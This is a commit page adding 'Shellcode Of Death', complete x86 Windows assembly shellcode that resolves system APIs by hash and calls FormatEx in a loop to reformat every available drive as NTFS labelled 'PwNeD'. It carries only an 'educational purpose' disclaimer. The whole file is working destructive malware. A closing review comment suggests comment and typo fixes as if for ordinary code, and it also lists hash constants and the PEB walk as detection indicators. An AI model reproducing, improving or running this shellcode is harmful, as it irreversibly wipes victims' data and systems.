
Commit 9be6b07

committed
Create ShellcodeOfDeath.s
ShellcodeOfDeath has been designed to format all the available drive on Windows. Disclaimer: This shellcode is developed for educational purpose only. The author is not and will not hold any responsibility for any illegal or unauthorized use of #ShellcodeOfDeath. Any use of this shellcode is at the reader’s own risk. Home Page: http://hacksys.vfreaks.com/ Post Link: http://hacksys.vfreaks.com/research/shellcode-of-death.html You may download Shellcode Of Death archive from the above link.
1 parent 480fb87 commit 9be6b07

1 file changed

Lines changed: 255 additions & 0 deletions


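--- a/ShellcodeOfDeath.s
+++ b/ShellcodeOfDeath.s
@@ -0,0 +1,255 @@
+/*
+* _ __ _____
+* /\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
+* / /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
+* / __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
+* \/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
+* |___/
+* http://hacksys.vfreaks.com/
+* hacksysteam@hotmail.com
+*
+* Shellcode Of Death
+* v1.0
+*
+* Ruei-Min Jiang (@mike820324) a.k.a MicroMike
+* Ashfaq Ansari (ashfaq_ansari1989@hotmail.com)
+*
+* Still a lot can be done to improve this shellcode. This is the first release.
+* Further, a lot of improvement and optimization can be done to this shellcode.
+* Any bugs, suggestions or contribution is most welcomed.
+*
+* Lenth of shellcode: 387 bytes
+* Number of NULL byte: 49
+*
+* Notes: There are more NULL bytes due to a fact that few of the Windows API used
+* accepts input in UNICODE format. Still, NULL bytes can be reduces further.
+* We can use any simple encoder to xor encode the shellcode and eventually
+* eliminate NULL bytes.
+*
+* Things to do:
+* 1. Code cleanup
+* 2. Optimization
+* 3. Minification
+* 4. Add suggestions
+*/
+.globl _main
+
+_main:
+jmp start_shell;
+/*
+* %edx store the base address of kernel32.dll (input)
+* %ebx points to the start of symbal name table (input)
+* %ecx contains the destination hash value (input)
+* %eax is the index_counter (output)
+*/
+hash_function:
+xorl %eax,%eax;
+next_entry:
+mov (%ebx,%eax,4), %esi;
+addl %edx, %esi;
+push %ebx;
+push %eax;
+xor %ebx, %ebx;
+continue_hash:
+xor %eax, %eax;
+lodsb;
+rol $5, %ebx;
+addl %eax, %ebx;
+cmp $0, %eax;
+jnz continue_hash;
+ror $5, %ebx;
+cmp %ecx, %ebx;
+pop %eax;
+pop %ebx;
+je hash_finish;
+inc %eax;
+jmp next_entry;
+hash_finish:
+ret;
+
+/*
+* input:
+* set %edx to the dll base address
+* set %ecx as the hash value you want to compare
+* output:
+* %eax is the API address
+*/
+get_address:
+PE_init:
+movl %edx, %eax;
+movl 0x3c(%eax), %eax;
+movl 0x78(%edx, %eax), %eax;
+leal (%edx, %eax), %eax;
+pushl %eax;
+movl 0x20(%eax), %eax;
+leal (%edx, %eax), %ebx;
+call hash_function;
+
+popl %ebx;
+movl 0x24(%ebx), %ecx;
+leal (%edx, %ecx), %ecx;
+movw (%ecx, %eax, 2), %ax;
+andl $0x0000ffff, %eax;
+
+movl 0x1c(%ebx), %ebx;
+leal (%edx, %ebx), %ebx;
+movl (%ebx, %eax, 4), %eax;
+leal (%edx, %eax), %eax;
+ret;
+/*
+* hash value for each API
+* LoadLibraryA = 0x331adddc
+* CloseHandle = 0xd7629096
+* CreateFileA = 0xcfb0e506
+* ExitProcess = 0xec468f87
+* Sleep = 0x567a110
+* DeviceIOControl = 0x3b34d4a7
+* --------------fmifs.dll---------------
+* FormatEx = 0xab025b64
+*/
+start_shell:
+set_Kernel32_env:
+xorl %ecx, %ecx
+movl %fs:0x30, %eax;
+movl 0xc(%eax), %eax;
+movl 0x1c(%eax), %eax;
+next_module:
+movl 0x8(%eax), %edx;
+movl 0x20(%eax), %edi;
+movl (%eax), %eax;
+cmp 0x18(%edi), %cl;
+jne next_module;
+
+set_hash_table:
+pushl $0xab025b64;
+pushl $0x0567a110;
+pushl $0x3b34d4a7;
+pushl $0xd7629096;
+pushl $0xec468f87;
+pushl $0xcfb0e506;
+pushl $0x331adddc;
+movl %esp, %ebp;
+end_hash_table:
+set_api_table:
+init_variable:
+pushl $7;
+popl %ecx;
+xorl %edi, %edi;
+loop_start:
+cmp $1, %ecx;
+jne set_kernel32_api;
+set_fmifs_env:
+pushl %ecx;
+jmp data_string;
+back_to_here:
+restore_loadlibrary:
+movl 0x1c(%esp), %eax;
+call *%eax;
+movl %eax, %edx;
+popl %ecx;
+set_kernel32_api:
+pushl %ecx;
+movl (%ebp, %edi, 4), %ecx;
+call get_address;
+popl %ecx;
+pushl %eax;
+inc %edi;
+loop loop_start;
+movl %esp, %ebp;
+jmp start_main_code;
+data_string:
+call back_to_here;
+.string "fmifs.dll";
+
+start_main_code:
+Get_string_addr:
+jmp 2f;
+1:;
+popl %esi;
+Format_start_loop:
+pushl $23;
+popl %ecx;
+format_loop_start:
+movl %ecx, %edi;
+
+CreateFile_call:
+xorl %edx, %edx;
+pushl %edx;
+pushl %edx;
+pushl $3;
+pushl %edx;
+pushl $3;
+pushl $0xc0000000;
+pushl %esi;
+movl 0x14(%ebp), %ebx;
+call *%ebx;
+Store_File_Handle:
+pushl %eax;
+subl $0x4, %esp;
+xorl %edx, %edx;
+DeviceIOControl_call:
+pushl %edx;
+leal 0x4(%esp), %ebx
+pushl %ebx;
+pushl %edx;
+pushl %edx;
+pushl %edx;
+pushl %edx;
+pushl $0x90020;
+pushl %eax;
+movl 0x8(%ebp), %ebx
+call *%ebx;
+close_file_handle:
+pushl 0x4(%esp);
+movl 0xc(%ebp), %ebx;
+call *%ebx;
+
+FormatEx_call:
+leal call_back-string_start(%esi),%eax;
+pushl %eax;
+pushl $4096;
+pushl $1;
+leal volume_label-string_start(%esi), %eax;
+pushl %eax;
+leal string2_start-string_start(%esi), %eax;
+pushl %eax;
+pushl $0xc;
+leal 0x8(%esi), %eax;
+pushl %eax;
+movl (%ebp), %ebx;
+call *%ebx;
+sleep_call:
+pushl $200;
+movl 0x4(%ebp), %ebx
+call *%ebx;
+loop_end:
+movl %edi, %ecx
+addl $1, 0x8(%esi);
+loop format_loop_start;
+
+exit_process:
+push $0;
+movl 0x10(%ebp), %ebx;
+call *%ebx;
+2:;
+call 1b;
+string_start:
+.byte 0x5c, 0x00, 0x5c, 0x00, 0x2e, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x00, 0x00
+string2_start:
+.byte 0x4e, 0x00, 0x54, 0x00, 0x46, 0x00, 0x53, 0x00, 0x00, 0x00
+/*
+* Volume Label
+* Set the name of the Volume label
+* after formatting the respective volume.
+* Modify volume_label as you desire.
+* Deafult value -- PwNeD
+*/
+volume_label:
+.byte 0x50, 0x00, 0x77, 0x00, 0x4E, 0x00, 0x65, 0x00, 0x44, 0x00, 0x00, 0x00
+call_back:
+push %ebp;
+movl %esp, %ebp;
+xorl %eax, %eax;
+inc %eax;
+pop %ebp;
+ret $0xc;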
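Review bot: The register contract documented above hash_function is narrower than how the code uses it: the comment says `%edx` holds the base of kernel32.dll, but get_address is also entered with `%edx` set to the module handle returned by the LoadLibraryA call at restore_loadlibrary (`movl %eax, %edx` immediately before the loop reaches `call get_address`), so the comment should read `* %edx = base address of the module whose export table is searched (kernel32.dll, later fmifs.dll)`. The get_address header lists only its inputs and the `%eax` result; it should also state that `%ebx`, `%ecx` and `%esi` are overwritten, which is the reason the caller at set_kernel32_api saves `%ecx` around the call. The header typos `Lenth`, `symbal` and `Deafult` are worth correcting in the same pass. For anyone reading this file from the detection side, the fixed ROL-5 hash constants pushed at set_hash_table and the `%fs:0x30` PEB walk in set_Kernel32_env are the stable static indicators of this sample.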
